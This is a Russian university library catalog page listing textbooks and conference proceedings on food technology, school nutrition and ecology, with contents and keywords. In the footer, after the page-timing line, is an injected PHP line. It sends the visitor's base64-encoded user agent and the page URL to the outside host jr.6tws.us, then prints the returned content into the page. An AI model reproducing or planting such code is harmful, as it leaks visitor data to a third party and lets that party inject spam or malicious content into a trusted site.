  • Гришина, Е. С. Добавки, регулирующие консистенцию молочных продуктов / Е. С. Гришина. - с.49-56
  • Сенин, И. Н. Соотношение государства, права и правового нигилизма / И. Н. Сенин. - с.57-60
    Кл. слова: НИГИЛИЗМ ПРАВОВОЙ
  • Клоков, Е. А. Тактика административного расследования / Е. А. Клоков. - с.61-69
    Кл. слова: РАССЛЕДОВАНИЕ АДМИНИСТРАТИВН
  • Аликова, А. Н. Вопрос об исторической преемственности "Литературной газеты" / А. Н. Аликова. - с.70-72
  • Седанов, А. А. Структура совокупного капитала / А. А. Седанов. - с.73-77
    Кл. слова: капитал совокупный
  • Кулеева, И. Ю. Право собственности на жилые помещения и конституционные гарантии его охраны / И. Ю. Кулеева. - с.78-84
  • Норышева, Р. А. Здоровое питание - один из факторов экологического образования современной молодежи / Р. А. Норышева. - с.85-93
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ
  • Настащук, Н. А. Дисциплина "Информационные системы в экономике" в профессиональной подготовки студентов экономических специальностей / Н. А. Настащук. - с.94-100
  • Калинина, Ю. И. Христианство и экология / Ю. И. Калинина. - с.101-110
  • Пасько, О. В. Ферментированный белковый обогатитель (ФБО) / О. В. Пасько, Н. Б. Гаврилова. - с.111-114
  • Винокурова, О. Н. Инновационный потенциал предпринимателей и инновации в образовании / О. Н. Винокурова. - с.115-119
  • Бондаревская, И. Н. Идеи Д. И. Менделеева в проблеме решения экологически чистых продуктов питания / И. Н. Бондаревская. - с.120-127
  • Калинина, Ю. И. О некоторых тенденциях развития экологического сознания / Ю. И. Калинина. - с.128-133
    Кл. слова: СОЗНАНИЕ ЭКОЛОГИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
17. 
Технологии пищевых производств [Текст] : учеб. для студентов высш. учеб. заведений / под общ. ред. А. П. Нечаева, 2005. - 767 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ НАСЕЛЕНИЯ -- ПРОДУКТЫ ПИЩЕВЫЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- ВОДА - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- СТАНДАРТИЗАЦИЯ ПРОДУКЦИИ ПИЩ -- СЕРТИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СЫРЬЕ ПИЩЕВОЕ -- ЗЕРНО - ПРОИЗВОДСТВО -- солод -- КРАХМАЛ - ПРОИЗВОДСТВО -- САХАР - ПРОИЗВОДСТВО -- МУКА ПШЕНИЧНАЯ - ГОСТ -- МОЛОКО - производство -- ЯЙЦЕПРОДУКТЫ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- БАД -- ПРОБИОТИКИ -- ТЕХНОЛОГИЯ ПРОДУКЦИИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИРЫ - производство -- ПИВО - производство -- КВАС -- ДРОЖЖИ - производство -- кислота лимонная -- УКСУС -- КИСЛОТА молочная -- КОНЬЯК - производство -- ВИНОДЕЛИЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- КОНСЕРВЫ ОВОЩНЫЕ - ПРОИЗВОДС -- КОНСЕРВЫ ПЛОДООВОЩНЫЕ -- ЧАЙ - производство
Держатели документа (Информация об экземплярах) 
18. 
Социально-экономические и правовые проблемы развития информационного общества [Текст] : материалы междунар. научно-практ. конф., 30 сент. 2009 г. В 5 т. Т. 5. Проблемы экологии и развития индустрии питания в современном обществе / М-во образования Омской обл., Администрация г. Омска, Региональное объединение работодателей Омской обл., Карагандинский ун-т "Болашак" (Республика Казахстан), Бишкекская финансово-экон. акад. (Кыргызская Республика), Сиб. ин-т бизнеса, управления и психологии, г. Красноярск, Омский экон. ин-т, 2009. - 150 с.
Ключевые слова 
Оглавление 
  • Беспалова, Т. А. Влияние биологически активных веществ на иммунный статус норок при алеутской болезни и иммуннодефицитных состояниях / Т. А. Беспалова, Е. А. Хитрова, О. А. Приступа. - с.7-15
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНАЯ, БОЛЕЗНЬ алеутская, ИММУНИТЕТ
  • Богачева, А. А. Здоровое питание подростков в условиях Крайнего Севера / А. А. Богачева, А. И. Турова. - с.15-18
    Кл. слова: ПИТАНИЕ ПОДРОСТКОВ, ПИТАНИЕ ЗДОРОВОЕ
  • Бураковская, Н. В. Актуальные вопросы производства плавленых сырков / Н. В. Бураковская. - с.18-21
    Кл. слова: СЫР ПЛАВЛЕНЫЙ, ПРОИЗВОДСТВО сыра
  • Вальтер, Г. Ф. Технология приготовления творога на основе подсгущеного молока / Г. Ф. Вальтер, П. А. Лисин. - с.21-23
    Кл. слова: ТВОРОГ, ДЕСЕРТ творожный, ПРОИЗВОДСТВО творога
  • Германская, Л. Г. Товароведческая оценка сырного продукта / Л. Г. Германская. - с.23-27
    Кл. слова: СЫР, КАЧЕСТВО сыра
  • Гришина, Е. С. Разработка и оптимизация рецептуры кисломолочного продукта с растительным наполнителем / Е. С. Гришина. - с.27-32
    Кл. слова: ПРОДУКТ КИСЛОМОЛОЧНЫЙ, НАПОЛНИТЕЛЬ растительный
  • Должанкин, В. С. Выбор способов очистки отработанных нефтепродуктов, применяемых в дорожно-строительной технике / В. С. Должанкин. - с.33-41
    Кл. слова: НЕФТЕПРОДУКТЫ, СЫРЬЕ ВТОРИЧНОЕ
  • Жигалкина, Т. С. Проблемы школьного питания учащихся / Т. С. Жигалкина. - с.42-46
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Жидкова, О. Н. Пищевые волокна в производстве молочных продуктов / О. Н. Жидкова. - с.46-50
    Кл. слова: ВОЛОКНО ПИЩЕВОЕ, ПРОИЗВОДСТВО МОЛОЧНОЕ
  • Завгородняя, Л. М. Йодированные молочные белки / Л. М. Завгородняя. - с.51-62
    Кл. слова: БЕЛОК - ПИТАНИЕ, ПРОДУКТЫ ЙОДИРОВАННЫЕ, ЙОД - ПИТАНИЕ
  • Изосимова, И. В. Влияние выжимок ягод на гидролитические изменения в мясорастительных паштетах / И. В. Изосимова, О. М. Сергачева, А. М. Тимофеева. - с.62-65
    Кл. слова: ПАШТЕТ, ВЫЖИМКА ягодная
  • Каня, И. П. Некоторые сведения о «Herbalife» / И. П. Каня. - с.65-70
    Кл. слова: Herbalife
  • Кащеева, Н. Л. Перспективы использования белково-углеродного сырья в производстве функциональных продуктов / Н. Л. Кащеева. - с.71--72
    Кл. слова: СЫРЬЕ белково-углеводное, ПРОИЗВОДСТВО МОЛОЧНОЕ
  • Королев, А. Н. Качество растениеводческой продукции в условиях техногенного дисбаланса химического состава почвы / А. Н. Королев. - с.73-78
    Кл. слова: БИОХИМИЯ
  • Королев, А. Н. Прогнозирование использования осадков сточных вод в растениеводческих хозяйствах с целью получения экологически безопасных продуктов / А. Н. Королев. - с.78-83
    Кл. слова: ПОЧВА - ЭКОЛОГИЯ, ПРОДУКТЫ ЭКОЛОГИЧЕСКИ ЧИСТЫЕ
  • Лапшинская, Н. А. Влияние молочной сыворотки на качество и безопасность низкокалорийных майонезов / Н. А. Лапшинская, Н. А. Драгун, М. М. Щукина. - с.83-89
    Кл. слова: СЫВОРОТКА молочная, МАЙОНЕЗ
  • Макарова, О. В. Разработка и исследование молочно-растительных систем / О. В. Макарова, О. В. Пасько. - с.89-92
    Кл. слова: ПРОДУКТЫ МОЛОЧНЫЕ, ИССЛЕДОВАНИЕ молочно-растительных систем
  • Мартемьянова, Л. Е. Термодинамический индекс термостабильности пищевых продуктов / Л. Е. Мартемьянова, П. А. Лисин. - с.92-96
    Кл. слова: ИНДЕКС термодинамический, ТЕРМОСТАБИЛЬНОСТЬ пищевых продуктов
  • Мартемьянова, Л. Е. Оценка активности воды пищевых продуктов / Л. Е. Мартемьянова, Г. Ф. Вальтер, П. А. Лисин. - с.97-101
    Кл. слова: ВОДА - ПИТАНИЕ
  • Маюрникова, Л. А. Формирование рынка продуктов специального назначения / Л. А. Маюрникова, Е. В. Санжаровский, Н. В. Горникова. - с.101-105
    Кл. слова: ПРОДУКТЫ специального назначения, КУЛЬТУРА ПИТАНИЯ
  • Миллер, М. А. Индустрия питания и здоровье населения в современных условиях / М. А. Миллер. - с.105-110
    Кл. слова: ИНДУСТРИЯ ПИТАНИЯ, ПИТАНИЕ - ЗДОРОВЬЕ
  • Молибога, Е. А. Безопасность продовольственного сырья и пищевых продуктов как одна из основных составляющих их качества / Е. А. Молибога. - с.111-114
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ
  • Неверов, Е. Н. Применение упаковки при охлаждении диоксидом углерода птицы / Е. Н. Неверов. - с.114-117
    Кл. слова: МЯСО охлажденное, ОХЛАЖДЕНИЕ
  • Никишина, И. Н. Возможности создания сегмента молочных продуктов из козьего молока в индустрии питания России / И. Н. Никишина, С. В. Симоненко, С. Е. Димитриева. - с.117-121
    Кл. слова: МОЛОКО козье
  • Петрова, Л. В. О безопасности и качестве сухого молока в процессе распылительной сушки / Л. В. Петрова, С. В. Петрова. - с.122-123
    Кл. слова: СУШКА распылительная, МОЛОКО сухое
  • Погребняк, А. И. Бизнес ресторанных услуг и проблема питания сибиряков на рубеже XX – XXI вв / А. И. Погребняк. - с.123-133
    Кл. слова: БИЗНЕС РЕСТОРАННЫЙ
  • Приступа, О. А. Ультраструктурная характеристика патологического процесса в центральной нервной системе животных при аутомутиляции / О. А. Приступа, Т. А. Беспалова. - с.134-139
  • Пронович, О. Н. Ценностный аспект глобального экологического кризиса / О. Н. Пронович. - с.140-142
    Кл. слова: КРИЗИС ЭКОЛОГИЧЕСКИЙ
  • Шадрин, М. А. Пищевая комбинаторика как фактор решения проблем при разработке новых технологий продуктов питания / М. А. Шадрин. - с.146-148
    Кл. слова: КОМБИНАТОРИКА
Держатели документа (Информация об экземплярах) 
19. 
Молодежь и наука: проблемы, поиски, решения. Проблемы питания и экологии: перспективы и инновационные пути их решения [Текст] : сб. материалов Междунар. науч.-практ. конф. студентов, аспирантов и докторантов, 23 сент. 2008 г. / АНО ВПО "Омский экономический ин-т", 2008. - 123 с.
Ключевые слова 
Оглавление 
  • Акшулаков, И. Школьное питание / И. Акшулаков. - с.14-15
  • Захарова, Л. В. Ключевые компоненты охраны здоровья школьников / Л. В. Захарова, Т. А. Шубина. - с.16-18
    Кл. слова: ОХРАНА ЗДОРОВЬЯ школьников
  • Каня, И. П. Болезни неправильного питания школьников / И. П. Каня, П. Осипов, Е. Мишина. - с.19-23
    Кл. слова: ПИТАНИЕ - ЗДОРОВЬЕ
  • Левочкина, С. М. Мониторинг организации питания учащихся СОШ № 33 / С. М. Левочкина, О. В. Пасько. - с.24-28
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Макарова, О. В. Анализ организации питания школьников различных возрастных групп на примере средней образовательной школы № 47 г. Омска / О. В. Макарова, Ю. В. Батурина. - с.29-33
  • Пасько, О. В. Анализ отношения учащихся СОШ № 116 г. Омска к вопросам здорового питания / О. В. Пасько, Л. Г. Германская, О. В. Макарова. - с.34-37
  • Пасько, О. В. Научные исследования молодых ученых Омского экономического института по оценке состояния и поиску решения проблем школьного питания в регионе / О. В. Пасько. - с.38-43
  • Пасько, О. В. Характеристика и анализ цикличного меню столовой СОШ № 116 / О. В. Пасько, Н. В. Кочеткова, С. Е. Козлова. - с.44-48
  • Пушмина, И. Н. Возможность использования цеолитов для обеспечения гигиенической безопасности молока и молочных продуктов в школьном питании / И. Н. Пушмина, М. А. Донова, С. И. Хорунжина. - с.49-54
    Кл. слова: цеолит
  • Характеристика и аналих организации питания школьников различных возрастных групп на примере лицея № 29 / ; М. А. Шадрин, А. Авагян, Н. Остапик и др.. - с.55-59
  • Шадрин, М. А. Мониторинг проблем школьного питания на примере лицея № 143 / М. А. Шадрин, Р. И. Чупин. - с.60-66
  • Артюхова, С. И. Улучшение структуры питания за счет разработки и производства новых функциональных кисломолочных десертов / С. И. Артюхова, А. А. Макшеев. - с.68-70
    Кл. слова: ДЕСЕРТ КИСЛОМОЛОЧНЫЙ
  • Беспалова, Т. А. Изучение показателей качества полукопченых колбас омских производителей при различных режимах обработки и хранения / Т. А. Беспалова, О. А. Приступа, И. В. Крючкова
    Кл. слова: КОЛБАСА
  • Евсеева, О. П. Информационное обеспечение профессиональной деятельности специалиста садово-паркового строительства / О. П. Евсеева. - с.79-81
  • Ермолаев, В. А. Активность воды в пищевых продуктах / В. А. Ермолаев. - с.82-85
  • Корнеева, Г. И. Сохранение биологичесского разнообразия растений - решение одной из экологических проблем современного общества / Г. И. Корнеева. - с.86-90
  • Леонтьева, В. В. Концептуальные аспекты развития сельских территорий / В. В. Леонтьева. - с.91-98
  • Матвеева, Е. Г. Оценка экологического ущерба природной окружающей среде от снижения загрязнения отходами асбестоцементного производства / Е. Г. Матвеева, Н. П. Лукутцова, Л. М. Шевченко. - с.99-101
  • Морозова, Е. В. Экологические аспекты производства мучных кондитерских изделий / Е. В. Морозова, В. А. Перевозова. - с.102-104
  • Панькив, О. Г. Биологически активные препараты на основе лесосечных отходов / О. Г. Панькив, В. Н. Паршикова, Р. А. Степень. - с.105-109
  • Русских, И. В. Чистец остисточашечковый и прямой; вариации последнего на Кавказе: биология, экология, охрана и рациональное использование / И. В. Русских, С. Б. Криворотов. - с.110-117
  • Тиленова, Д. К. Факторы и процессы формирования химического состава вод рек Южного Кыргыстана (Бассейн р. Сырдарьи) / Д. К. Тиленова. - с.118-121
Держатели документа (Информация об экземплярах) 
20. 
Каня И. П. Физиология питания [Текст] : учеб. пособие для студентов специальности 260501 "Технология продуктов общественного питания" / И. П. Каня, 2007. - 344 с.
Ключевые слова 
Система пищеварительная -- ПИЩА -- ПИЩЕВАРЕНИЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- МИКРОНУТРИЕНТЫ -- ПИТАНИЕ СБАЛАНСИРОВАННОЕ -- РАЦИОН ПИТАНИЯ -- РЕЖИМ ПИТАНИЯ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕ -- ПРОДУКТЫ МЯСНЫЕ - Питание -- ПРОДУКТЫ РЫБНЫЕ - Питание -- ПРОДУКТЫ МОЛОЧНЫЕ - питание -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ОЖИРЕНИЕ - ПРОФИЛАКТИКА -- кариес - профилактика -- ВЕГЕТАРИНСТВО -- СЫРОЕДЕНИЕ -- ПИТАНИЕ РАЗДЕЛЬНОЕ -- ГОЛОДАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ - ЗДОРОВЬЕ -- Питание - Группа крови
Держатели документа (Информация об экземплярах) 
21. 
Никаноров А.М. Глобальная экология [Текст] : Учебное пособие / А.М. Никаноров, Т.А. Хоружая, 2003. - 288 с.
Ключевые слова 
ЭКОЛОГИЯ ГЛОБАЛЬНАЯ -- ЭКОСИСТЕМА -- Закон Шелфорда -- Закон Либиха -- БИОСФЕРА - ЭВОЛЮЦИЯ -- НОРМИРОВАНИЕ ЭКОЛОГИЧЕСКОЕ -- УСТОЙЧИВОСТЬ экосистем -- КРИЗИС ЭКОЛОГИЧЕСКИЙ -- КАТАСТРОФА ТЕХНОГЕННАЯ -- СИТУАЦИЯ ЧРЕЗВЫЧАЙНАЯ -- БЕДСТВИЕ СТИХИЙНОЕ -- ПОЖАР ЛЕСНОЙ -- АВАРИЯ промышленная -- БЕДСТВИЕ СТИХИЙНОЕ - Россия -- ПРОБЛЕМЫ ГЛОБАЛЬНЫЕ ЭКОЛОГИЧ -- КЛИМАТ - ПОТЕПЛЕНИЕ -- ПАРНИКОВЫЙ ЭФФЕКТ -- НАВОДНЕНИЕ -- ОЗОНОВЫЙ СЛОЙ -- ЗАГРЯЗНЕНИЕ ОКРУЖАЮЩЕЙ СРЕДЫ -- ДОЖДЬ КИСЛОТНЫЙ -- ВОЗДУХ АТМОСФЕРНЫЙ -- АТМОСФЕРА - ЭКОЛОГИЯ -- КОСМОС - ЭКОЛОГИЯ -- ВОДА - ЭКОЛОГИЯ -- ЗАГРЯЗНЕНИЕ химическое -- Загрязнение токсическое -- ВОДА ПИТЬЕВАЯ -- ОКЕАН МИРОВОЙ - ЭКОЛОГИЯ -- ОТХОДЫ РАДИОАКТИВНЫЕ - ЭКОЛО -- ГОРОД - ЭКОЛОГИЯ -- Разнообразие биологическое -- МЕДИЦИНА экологическая -- ЗДОРОВЬЕ - ЭКОЛОГИЯ -- ПИТАНИЕ - ЗДОРОВЬЕ -- ЗДОРОВЬЕ НАСЕЛЕНИЯ - север -- ПОЛИТИКА ЭКОЛОГИЧЕСКАЯ -- УСТОЙЧИВОЕ РАЗВИТИЕ -- ПРОГРАММА экологическая -- АРКТИКА - Экология -- МОРЕ ЧЕРНОЕ - ЭКОЛОГИЯ -- СПУТНИК ИСКУССТВЕННЫЙ -- ЕВРОПА - Экология
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3020 - 16.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.23 с.20 запросов, 0.78c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;